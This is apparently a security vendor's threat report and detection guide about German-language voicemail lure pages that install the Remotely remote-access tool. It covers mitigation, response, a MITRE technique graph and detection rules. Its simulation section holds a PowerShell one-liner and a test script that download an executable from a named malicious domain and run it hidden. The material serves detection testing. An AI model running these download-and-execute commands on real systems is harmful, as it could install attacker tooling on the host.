Voicemail Trap: German-Language Voicemail Lure Leads to Remote Access
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Threat actors are hosting German-language “voicemail” landing pages that entice users to download a BAT file. The script plays a benign audio decoy while quietly installing the legitimate Remotely remote monitoring tool. Once deployed, the RMM agent gives the attacker persistent remote access through attacker-controlled C2 infrastructure.
Investigation
Censys identified 86 compromised web properties on *.cadillac.ps domains distributing the malicious BAT. The script invokes a PowerShell installer hosted on remotely.billbutterworth.com, which pulls a Remotely ZIP package. The archive contains the Remotely agent components and a service that installs under C:\Program Files\Remotely.
Mitigation
Block *.cadillac.ps domains and remotely.billbutterworth.com at the DNS/proxy layer. Train users not to run unexpected BAT files or copy/paste PowerShell commands from unknown webpages. Deploy endpoint controls to detect Remotely service creation and suspicious install paths or unsigned tooling.
Response
Alert on creation of Remotely_Service and presence of Remotely_Agent.exe under Program Files. Hunt for voicemail.bat and the associated PowerShell installer activity. Isolate affected hosts, collect forensic artifacts, and rotate/revoke any credentials or tokens leveraged by the RMM agent.
"graph TB %% Class definitions classDef action fill:#99ccff %% Nodes node_content_injection["<b>Technique</b> – T1659 Content Injection<br/>Compromised web property delivers malicious link."] class node_content_injection action node_initial_user_exec["<b>Technique</b> – T1204.001 User Execution: Malicious Link<br/>Victim clicks malicious link to a compromised voicemail landing page."] class node_initial_user_exec action node_cmd_shell["<b>Technique</b> – T1059.003 Windows Command Shell<br/>BAT file (voicemail.bat) downloaded and executed."] class node_cmd_shell action node_powershell["<b>Technique</b> – T1059.001 PowerShell<br/>Install-Remotely.ps1 script installs Remotely RMM."] class node_powershell action node_system_service["<b>Technique</b> – T1569 System Services<br/>RMM installed as Windows service (Remotely_Service)."] class node_system_service action node_masquerading["<b>Technique</b> – T1036 Masquerading & T1036.008 Masquerade File Type<br/>BAT presented as media update; files placed in Program Files."] class node_masquerading action node_hide_artifacts["<b>Technique</b> – T1564 Hide Artifacts<br/>Installation artifacts hidden in C:\Program Files\Remotely."] class node_hide_artifacts action node_c2["<b>Technique</b> – T1102.002 Web Service Bidirectional Communication & T1071 Application Layer Protocol<br/>HTTPS communication with remote server."] class node_c2 action %% Connections node_content_injection –>|supports| node_initial_user_exec node_initial_user_exec –>|leads_to| node_cmd_shell node_cmd_shell –>|executes| node_powershell node_powershell –>|installs| node_system_service node_system_service –>|uses| node_masquerading node_system_service –>|uses| node_hide_artifacts node_system_service –>|establishes| node_c2 "
Attack Flow
Detections
Download or Upload via Powershell (via cmdline)
View
Suspicious Ransomware Interfering Service Stoppage (via cmdline)
View
Powershell Executing File In Suspicious Directory Using Bypass Execution Policy (via cmdline)
View
IOCs (HashSha256) to detect: Voicemail Trap: German-Language Voicemail Lure Leads to Remote Access
View
IOCs (HashMd5) to detect: Voicemail Trap: German-Language Voicemail Lure Leads to Remote Access
View
German Voicemail Lure Leading to RMM Installation [Webserver]
View
Voicemail BAT File Execution Detection [Windows File Event]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
- Phishing Delivery: The attacker sends an email with a German‑language voicemail lure attachment (HTML) that, when opened, redirects the victim to
http://bannerbank.cadillac.ps/voicemail.html. - Landing Page Execution: The landing page hosts a malicious PowerShell one‑liner that downloads and executes a remote‑management‑tool (RMM) installer.
- Process Creation: When the victim’s browser processes the page, PowerShell is invoked with a command line that explicitly includes the two strings the rule watches for.
- Resulting Telemetry: Windows logs Event ID 4688 with a
CommandLinecontaining both “voicemail-themed landing page” and “bannerbank.cadillac.ps”, thereby satisfying the Sigma condition.
The exact command used for the simulation:
# Simulated malicious execution – contains both trigger strings Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"Write-Host 'voicemail-themed landing page'; Invoke-WebRequest -Uri 'http://bannerbank.cadillac.ps/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe`"" - Phishing Delivery: The attacker sends an email with a German‑language voicemail lure attachment (HTML) that, when opened, redirects the victim to
-
Regression Test Script: A self‑contained PowerShell script that reproduces the attack and can be run on any Windows host with the required logging enabled.
<# .SYNOPSIS Simulates the German voicemail lure that triggers the Sigma detection rule. .DESCRIPTION Executes a PowerShell command line containing both required substrings. #> # Define malicious strings $lureText = "voicemail-themed landing page" $maliciousDomain = "bannerbank.cadillac.ps" # Build the one‑liner that will appear in the command line $payload = @" Write-Host '$lureText'; Invoke-WebRequest -Uri 'http://$maliciousDomain/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe "@ # Launch PowerShell with the crafted command line $psArgs = "-NoProfile -WindowStyle Hidden -Command `"$payload`"" Write-Host "Launching malicious PowerShell command..." Start-Process -FilePath "powershell.exe" -ArgumentList $psArgs -PassThru # Optional: wait a few seconds to ensure logging Start-Sleep -Seconds 5 -
Cleanup Commands: Remove the downloaded installer and any residual processes.
# Stop any lingering installer process Get-Process -Name "installer" -ErrorAction SilentlyContinue | Stop-Process -Force # Delete the temporary installer file $installerPath = "$env:TEMPinstaller.exe" if (Test-Path $installerPath) { Remove-Item $installerPath -Force Write-Host "Cleaned up $installerPath" }